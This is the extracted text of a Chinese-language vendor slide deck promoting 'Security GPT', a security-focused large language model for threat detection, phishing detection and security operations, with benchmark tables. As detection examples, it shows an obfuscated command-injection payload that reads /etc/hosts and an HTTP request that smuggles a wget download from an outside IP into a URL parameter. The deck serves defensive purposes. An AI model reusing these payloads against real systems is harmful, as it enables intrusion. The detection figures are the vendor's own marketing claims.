AI大模型时代下的网络安全建设方案（37页 PPT）

微信扫码，打开到小程序

安全 GPT ：大模型时代下的网络安全建设思路 重新定义安全检测与安全运营 D I R ECTO RY 目录 02 安全 GPT 能力介 绍 03 部署形态与展望 01 安全困境 网络边界安全能力 企业一般都会划分了多个网络区域，如总部办公大楼、运维管 理中心、居家 / 出差等远程办公区域、分支机构、各地办事处等 边界处，通常已部署防火墙、网络入侵检测、 WAF 、流量探针 等边界防护等安全能力 办公 / 计算环境安全能力 针对办公终端或数据中心的计算 / 存储等环境，通常已部署了终 端 / 主机防病毒、防火墙、网络入侵检测、流量探针、上网行 为 审计等能力，核心资源如数据库，还会考虑数据库防护、操 作 审计以及数据备份等机制 通信网络安全能力 主要针对外部网络接入， 通常已部署 IPSEC/SSL VPN 等技术， 实现网络接入与业务访问的安全控制， 保障网络数据传输的机 密性和完整性 EDR/CWPP 各 类业 务 应用 与 服务 互 联网 大数据平台 / 数据存储 / 分析计算 /… … 数 据库 防 护 安全 流 量探 针 FW/IPS/IDS 运维管理安全能力 通常会部署了防火墙、态势感知、安全漏洞扫描 / 基线核查、运 维堡垒机、日志审计管理、上网行为审计等安全能力 安全建设基础相对完备， 能力的聚合和运营将成为关键 AV/ EPP/EDR 上 网 行 为 审 计 安 全 流 量 探 针 FW/ IPS/ IDS AV/ EPP/EDR 态 势感 知 平台 上 网行 为 审计 安 全漏 洞 扫描 安 全流 量 探针 运 维堡 垒 机 FW/IPS/IDS EDR/CWPP Web APP 数据库 Email 网页防篡改 安全流量探针 FW/IPS/IDS AV/ EPP/EDR SSL/IPSEC VPN 上 网 行 为 审 计 安 全 流 量 探 针 FW/ IPS/ IDS AV/ EPP/EDR SSL/IPSEC VPN 上 网 行 为 审 计 安 全 流 量 探 针 FW/ IPS/ IDS AV/ EPP/EDR SSL/IPSEC VPN 局域网 / 专网 互联网 / 广域网 数据中心区 DMZ 区 远程办公 总部办公 地方办事处 运维中心 分支机构 W A F 邮 件 安 全 网 关 I D P S 品 牌 6 聚 合 / 分 析 / 响 应 E D R 品 牌 5 聚 合 / 分 析 / 响 应 E P P C A S B 品 牌 4 聚 合 / 分 析 / 响 应 C W P P 品 牌 3 聚 合 / 分 析 / 响 应 堡 垒 机 日 志 审 计 安 全 态 势 感 知 漏 洞 扫 描 身 份 管 理 碎片化的传统防御， 0day 检测能力弱 安全研判 / 响应高 度依赖人，但高水 平人才供给长期不 足，且人的精力、 能力存在瓶颈 情报、自动化能力不 足，追不上攻击的变 化和发展 大语言模型助力攻击者批量、低成本产出高级攻击工具 攻击：初级攻击者，借助 AI 大模型，可以 批 量产出高级的攻击工具 防御：追不上攻击者，担心 0day 攻击造 成 严重影响后，感知不到或响应速度慢 1. 生成高对抗的攻击 payload 2. 零特征的反弹 shell 脚本 VS 专业黑客大模型 -WormGPT 品 牌 2 聚 合 / 分 析 / 响 应 品 牌 1 聚 合 / 分 析 / 响 应 数 据 分 级 分 类 数 据 库 审 计 N G F W C S P M S W G D L P Z T A • 告警数量多，噪声大； • 告警难分层分类，没办法每条告警都去分析； • 人员能力难支撑高效的告警、事件研判； • 人员精力难支撑 7×24 小时全天候值守； • 担心漏报，被钓鱼； • 处置效率低，设备联动能力差； • 资产管理、数据统计等效率低； • 发生事件之后再追溯， 一直跑在攻击者后面 数据分析能力 长时间值守精力 自动化、智能化成为当下安全防护效果提升的关键途径 D I R ECTO RY 目录 02 安全 GPT 能力介绍 03 部署形态与展望 01 安全困 境 业 界 … … 深信服长期 AI 战略，人才、数据、架构的先发优势 2012 2016 2020 2023 无监督学习行为建模，标 记攻击和异常 AI First 战略 云、网、端广泛应用小模 型 GO-g le 基于 PaLM 的 Sec-PaLM B Microsoft 基于 GPT-4 的 Security Copilot ⃞cy be reason 基于 AI 的终端检测响 应和威胁对抗 利用机器学习进行 数据安全合规评估 AI 分析恶意加密 流量 AISecOps 智能安 全运营 基于溯源图的终端 行为分析 SecurityGPT 公开 发布 Dex abeam 异常日志识别和分析 AI 小模型 取得明显成 效 全面拥抱 大模型 QRadar Watson ，基 于 AI 的日志分析和处 置 建议 NoDR 云原生行为基 线生成和检测 SAVE 3.0 多内核 AI 文件检测引擎 基于机器学习的加 密流量检测 基于深度学习的恶 意 DNS 检测 SAVE AI 文件检测 引擎 WISE 语法语义检 测引擎 将大模型用于检 测、情报等领域 威胁情报智能研 判和生成 深 信 服 基于机器学习的 恶意文件检测 特色与优势 （落地使用客户 120+ ） • 投入早、投入大： 2022 年 12 月底开始训练、 518 发 布； > 五百张 A100/A800 显卡集群； 400 人专职硕博 团队 • 安全领域大数据：公司体量 20 年累积的安全数据 • 独一份的架构支持：主营业务为云和安全， 为 AI 敏捷 开 发提供架构支持，包括模型备份、数据缓存、网络 优化 等，并提供大规模的动态算力接入条件 • 独一份的数据飞轮：国内独家的安全运营中心业务，真 实的客户问答和运营场景，提供真实的人类数据反馈 国内第一个企业级的安全垂直领域大模型 高级威胁检测 辅助驾驶 智能驾驶 五百张 A100/A80 0 显卡集群 上百人的创新研 究院硕博团队 深信服 20 年的 安 全行业积累 数据 首个通过《深度合成服 务算法备案》的安全垂 直领域大模型 首个借助安全大模型技 术全面赋能安全托管服 务（ MSS ）的厂商 自安全 GPT 国内首发亮相以来，深信服大模型独创的产品理念、应用范式已逐渐成为行业事实性标杆！ 国内首发，引领行业 24 年 1 月 26 日 ↓ 安全 GPT 3.0 23 年 9 月 22 日 ↓ 安全 GPT 2.0 首个网络安全智驾理念 首个钓鱼检测大模型 首个对话式安全助手 首个检测领域大模型 大力投入 GPT 23 年 5 月 18 日 安全 GPT 1.0 2022 年 12 月 现在 - > 未 来 多元化布局，网络安全新质生产力爆发 不限于对话聊天，利用大模型实质性提升未知威胁检测、钓鱼检测、安全运营处置等专业网安场景效果 安全 GPT 已累计在 120 多家企 业 真实环境测试和应用，帮助 金 融、能源、政府机关等行 业用 户提升安全人员实际分 析水平 和处置效率。 正在研发 待发布 防火墙 态势感知 流量检测 终端安全 …… 赋能敏感数据识别、分类分级、数据流转分析、代码漏洞识别与修复等场景 作为智能助手，提供辅助运营分析、自动研判处置等价值， 优化安全运营效率 作为检测引擎，识别未知的、隐蔽的和高对抗性的威胁和攻击行为 SecurityGPT 垂直领域的安全大模型 主机钓鱼威胁检测 安全告警 / 事件自主值守 安全代码辅助开发 流量攻击威胁检测 数据资产治理与流转分析 XDR （安全运营平台） 对话式安全运营助手 流量威胁检测 智能驾驶 主机钓鱼检测 辅助驾驶 零信任平台 数据安全平台 检测类大模型 运营类大模型 其他类大模型 …… 检测大模型 模型 安全 GPT 检测大模型 数据 流量日志 代码 溯源报告 恶意样本 安全知识 情报 公开漏洞 IOA 日志 代码理解能力 <%@page import=” <%@page import=”java ... 安全常识理解能力 Shell 俗称壳（用来区别于核）， 是指“为使用者提 供操作界面”的软件（命令解析器） 。它类似于 DOS 下 的 command. com 和 后 来 的 cmd. exe 。 它 接 收 用户命令，然后调用相应的应用程序。 攻防对抗理解能力 c\at /e\t\c/\ho\s\ts 是一个命令注入攻击的 payload ，该 payload 使用了插入了特殊字符 , 还原后的 payload 为： cat /etc/hosts HTTP 流量理解能力 POST /index.action HTTP POST /index.action HTTP/1.1 ... 通过海量的 HTTP 流量、日志、代码等数据的预训练而成的深信服大 模 型具备了 HTTP 流量理解能力、代码理解能力、攻防对抗理解能力 和安 全常识理解能力 , 类似一个攻防专家。 大模型突出的“语言”能力，高效解析安全文本 自注意力机制的引入，大大减轻了遗忘问题并提高了上下文关联性的识别。 颜色越深说明与生成词之间的相关性越高。 具备能力 预训练 微调 DNS 隐秘隧道检测 DNS 日志 域名有效信息熵、访问行为特征 随机森林 DGA 检测 DNS 日志 域名文法特征、访问行为特征 NLP 、 图分析 新核心域名检测 DNS 日志 域名文法特征、访问行为特征 NLP 、异常检测 僵尸网络家族变种跟踪 DNS 日志 主机 - 域名 - 解析 IP 图谱结构信息 图分析 HTTPS C&C 通信检测 HTTPS 日 志 TLS 握手特征、证书特征、背景流量特征 随机森林 加密 RDP 、 SSH 慢速爆 破 检测 RDP 日志、 SSH 日志 访问频率、登录状态特征 随机森林 网页篡改检测 web 访问日志 网页内容语法特征 NLP SAVE 文件杀毒 文件 静态文件特征 XGBOOST web 应用层检测 HTTP 日志 文法特征、流量行为特征 NLP 内网穿透监测 会话日志 流量行为特征 随机森林 告警消减 多元日志 检测日志时间与空间维度的关联特征 聚类 异常外发行为检测 会话日志 流量行为特征 异常检测 异常登录行为检测 登录日志 登录行为特征 异常检测 攻击路径溯源 多元日志 多元日志关联特征 知识图谱 题目类型 题目数量 对照一 对照二 SecurityGPT SQL 注 入 21377 84.90 73.37 98.34 PHP 代码注入 27564 53.97 60.74 99.68 Java 代码注入 27370 44.22 30.88 84.86 XSS 15381 92.74 46.45 97.00 题目类型 题目数量 对照一 对照二 SecurityGPT HW 热门漏洞 249 65.86 73.33 91.97 Wehshell 上传 10053 75.29 72.60 99.41 Java 反序列化 30550 40.65 35.50 94.52 命令注入 36780 65.90 39.88 98.55 利用大模型重做 Web 安全检测： • 仅百亿级参数大模型，训练两周， 效果超越持续优化 4 年的语义分析引擎 • 12 类无样本攻击类型， 其中 9 类超越了现有语义分析引擎 • 5000w+ 实际流量样本测试，大模型优化后呈现高检出、低误报特性 【题目示例】请问以下流量是否恶意： GET /easportal/tools/appUtil.jsp?EAS_HOME=kingdeed/eas/&type=123&downloadUrl=;wget http://158.247.232.182:8000/test.zip HTTP/1.1 Host: 183.250.164.212:8080 Connection: close 利用大模型确实能够有效提升未知威胁检测效果 利用传统机器学习已经取得不错效果的部分场景 2023 年 9 月 -11 月期间，蓝军通过检测 大模 型共捕获 32 个在野利用的 0day 漏 洞，漏洞 细节之前未被披露过 云端 0day 漏洞捕获（ 2023 年 9 月 -11 月） 0day 检测：深信服安全 GPT 0Day 检测的效果 全年深信服共报送国测 CNNVD 133 个原创 0day 漏洞，受漏洞审核和收录的周期影响， 截止到 2024 年 1 月 5 号， CNNVD 完成审核和收录的漏洞为 60 个，其中高危以上的漏洞数量占 12 个。 10 月、 11 月、 12 月共收录了 35 个漏洞。 厂商样本互测 背景：深信服和某 SOC 厂商各出 40 个样本互测 操作步骤：将深信服样本在某 SOC 进行回放， 将 SOC 厂商样本 在 深信服安全 GPT 进行回放 结果： 1 ） SOC 平台回放深信服 40 个样本， 检出 5 个， SOC 平台检 出率 12.5% 2 ） 安全 GPT 回放 SOC 厂商 40 个样本， 检出 38 个， 安全 GPT 检 出率 97.4% 安全 GPT 独报复测 背景： 11.08 在客户实际环境， 安全 GPT 已验证独报告警 430 条 操作步骤：将所有安全 GPT 独报数据数据在业界知名 NDR 和 SOC 回放， 观察 SOC 平台产生告警 结果： SOC 平台检出 44 条告警 SOC 平台检出率 10.2% 少量样本基本能力测试 1 、 检出率 100% 。 回放 25 个数据包， 主要覆盖 Web 通 用攻 击 、 通 用 组 件 漏 洞 攻 击 、 混 淆 绕 过 攻 击 、 2023-HVV 0/nday ； 2 、 三层混淆样本 （宋老师提供） 打开两层即判定为攻击文 件， 传统引擎和通用 GPT4.0 均未检出； 1 、 [ 检出和独报 ] 10.30-11.06 期间， 安全 GPT 总共产生告警 1885 条， 相比 友 商独报 430 条， 新增独报率 22.8% ； 2 、 [ 精准率 ] 正报 1830 条， 误报 55 条， 安全 GPT 精准率为 97.1% ； 生产环境实际检测效果 某部委实际测试进展（ 2023 年 11 月） 综合意图评估和研判 模糊匹配和基线拟合 附件检测 字符串匹配 钓鱼场景分类 ↓ 异常点解读 ↓ 意图综合分析 ↓ 响应处置建议 3 、意图识别 （人工、安全 GPT ） 钓鱼邮件检测 1.0 钓鱼邮件识别方法 2 、模式匹配 1 、特征 / 规则 邮件内容主题抽取 已知样本变种检测 变种样本检测 附件行为动态分析 图片内容识别 邮件历史分析 附件静态分析 附件投递对抗 敏感词检测 PE 文件 / 非 PE 文件 发件源黑名单 外链识别 钓鱼邮件检测 3.0 钓鱼邮件检测 2.0 网页语义意图 投递方式识别 附件行为意图 URL 跳转意图 历史邮件分析 正文语义意图 视觉特征分析 攻击目的分析 防钓鱼新时代 基于“攻击理解 + 逻辑推理”识别钓鱼 懂攻防、懂技术、 懂人情世故的“安 全专家” 安全 GPT ：钓鱼防御“新时代” 防 钓 鱼 核 心 能 力 全 景 图 终端检测 安全 大模型 厂商 专家高对抗样本 攻击大模型输出样本 VT 黑白混合 样本 (95W) 白样本误报率 （ 100W ） 国内 Top 邮件安 全友商 7.3%(292/4000) 10.7%(2782/26000) 检出 3432 个 正报 0.15% 国际友 商 9.7%(388/4000) 13.3%(3458/26000) 检出 4623 个 正报 0.11% aES+ 安 全 GPT 检 测大 模 型 91.3%(3656/400 0) 95.4%(24804/26000) 检出 16877 个 正报 0.046% 攻击队高级 APT 钓鱼攻击 链 深信服传统 检测能力 国内及 Top 友 商 国际 Top 友商 aES+ 安全 GPT 攻击链 1 √ √ √ √ 攻击链 2 √ × √ √ 攻击链 3 √ × × √ 攻击链 4 × × × √ 攻击链 5 × × √ √ 攻击链 6 × × × √ 攻击链 7 × × × √ 结合 2023 年 APT ，构造主流的强对抗攻击链： 传统的检测能力能够定性出两条攻击链为钓鱼攻击， 国内友商对 7 条攻击链只检出一条，国际友商可以定 性 3 条， aES+